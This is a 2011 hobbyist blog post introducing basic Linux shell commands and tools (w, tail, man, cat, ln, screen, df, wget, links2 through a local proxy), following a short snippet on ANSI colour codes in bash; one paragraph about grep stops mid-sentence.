echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blueish \033[0;34;4m"
echo -e "This is underlined\033[0m this is not"
 

 Some Useful Attribute Codes 

0m = Reset all attributes.
1m = Set the "bright" attribute.
2m = Set the "dim" attribute.
4m = Sets the "underline" attribute
5m = Sets the "blink" attribute.
7m = Sets the "reverse" attribute.
8m = Sets the "hidden" attribute.

This is where I'll end this quick example of ANSI/TV100 being used to add color to your bash scripts. This is only a sample of the possibilities these codes create, so don't think it ends here. You can learn more at this site.

Tuesday, May 10, 2011

Some useful shell commands/tools

Well I've been learning some useful things I've previously didn't know about so I though I'd take a moment and post some useful things you can do at the command line.


See who's logged in and what they're doing with the "w" command;

~ $ w
 00:41:06 up 1 day,  1:13,  8 users,  load average: 1.57, 1.14, 1.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
pathogen pts/0    :0.0             Sun23    2:27m 57.59s  3:26  /usr/bin/python
pathogen pts/1    :0.0             Mon00   23:08m  0.29s  0.29s /bin/bash
pathogen pts/2    :0.0             Mon00   23:59m 35.86s  0.27s /bin/bash
pathogen pts/3    :0.0             Mon01   22:41m  4.50s  4.25s polipo
pathogen pts/4    :0.0             Mon02    1:42  44.25s  3:26  /usr/bin/python
pathogen pts/5    :0.0             23:32    0.00s  0.27s  0.01s w
pathogen pts/6    :0.0             23:34   57:46   0.48s  0.48s bash
pathogen pts/7    :0.0             23:44   56:24   0.28s  0.28s /bin/bash

The next command is the "tail" command which we used with arpwatch in a previous post. This command can be used to read the last 10 lines (or more) of a file or piped data and displays it in the terminal. This is nice if you want to watch logfiles for example.

tail -f /var/log/syslog

Another good command line tool is "top", which displays processor and process statistics in real time. 


Next is extremely handy command - man - which is short for manual and is used to display in-depth information about a given command or gives you the ability to search for manuals containing a keyword. For example, the command "man ascii" returns a rather detailed ascii chart - which we all know can be a lifesaver. You can search for manuals containing a keyword like so;

~ $ man -k irc
aircrack-ng (1)      - a 802.11 WEP / WPA-PSK key cracker
airodump-ng (1)      - a wireless packet capture tool for aircrack-ng
airtun-ng (1)        - a virtual tunnel interface creator for aircrack-ng
queue (3)            - implementations of lists, tail queues, and circular queues
dir_colors (5)       - configuration file for dircolors(1)
dircolors (1)        - color setup for ls
irssi (1)            - a modular IRC client for UNIX
xchat (1)            - IRC client for X similar to AmIRC
XCirculateEvent (3)  - CirculateNotify event structure
XCirculateRequestEvent (3) - CirculateRequest event structure
XCirculateSubwindows (3) - change window stacking order
XCirculateSubwindowsDown (3) - change window stacking order
XCirculateSubwindowsUp (3) - change window stacking order

This one is more a tip - autocompleting a command or directory using "TAB". If there's only one option then it autocompletes when you hit tab, otherwise it shows the possibilities. For example hitting "TAB" when I have net typed in the shell will return this;

~ $ net
net         netcat      netkit-ftp  net.samba3  netscsid    netstat  

And hitting tab with /var/ typed will show me the existing directories in /var/ but if I hit "TAB" with "/var/r" than it will autocomplete it with "/var/run" because there's only one option.

This next command is "cat", which concatenates a file and displays it in the terminal. For example if we wanted to read the text file "hakhub" we could just use "cat";

~ $ cat hakhub
Is effin awesome.

You can also string commands together using the ";" operator, like we have with the ip parser and nmap. For example we can make a make a new directory and then copy our "hakhub" textfile to it. We will "cat" it at the end to verify it's there.

mkdir learning; cp hakhub /root/learning/;cat /root/learning/hakhub

Another useful command is "ln", which creates a link to a given file. For example we will make a symbolic link in the learning directory we created to the "hakhub" textfile in our root directory. Assuming we are currently in the root directory we will issue this command;

ln -s hakhub /root/learning/stuff

There's now a file in out learning directory which links back to our hakhub textfile, so if we were to cat the "stuff" link it would display it's contents just as before. So this could be useful to create links to tools located in various directories.

The next useful shell command is "screen", which I use to easily switch between various shells in one window (using CRTL A);
 “Screen is a full-screen window manager that multiplexes a physical terminal between several processes (typically interactive shells).”
You can read more about screen and get an idea of what it is and how it can be used here - http://linux.die.net/man/1/screen 

This next one is "df", which stands for diskfree. Very basic but still nice to know if you have multiple drives or usb's up the yingyang.

 ~ $ df 
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/sda1            237431480  51512296 173858308  23% /
none                    501520       316    501204   1% /dev
none                    508544       284    508260   1% /dev/shm
none                    508544       112    508432   1% /var/run
none                    508544         0    508544   0% /var/lock
none                    508544         0    508544   0% /lib/init/rw
none                 237431480  51512296 173858308  23% /var/lib/ureadahead/debugfs
/dev/sdd1              1965696    637664   1328032  33% /media/SD Card
/dev/sdc1              1930464   1291072    639392  67% /media/disk-1

Next is "wget", which is a utility for non-interactive download of files from the internet. It supports both http and https along with ftp and has the ability to utilize proxies. This can be used in a variety of ways, it can be used with conky via bash scripts for example. Backtrack 4 uses a wget bash script to check the external ip and display it in conky. Though the possibilities are endless, that's just one example.

Another great tool that's simple yet has a ton of possible uses when coupled with other tools, grep. This tool is based around regular expressions and is used to search files for text. For example, this command would look for 

This next tool is links2 which is a console-based text web browser which is extremely lightweight as you could imagine. There's others like it such as lynx, but I prefer links2 myself. You can use it by typing links2 in your console, then pressing "g" and entering the url. You can use links2 with a proxy like so;

links2 -http-proxy 127.0.0.1:9050

or to run it with a graphical interface, you can add a "-g"

links2 -g -http-proxy 127.0.0.1:9050

To be continued......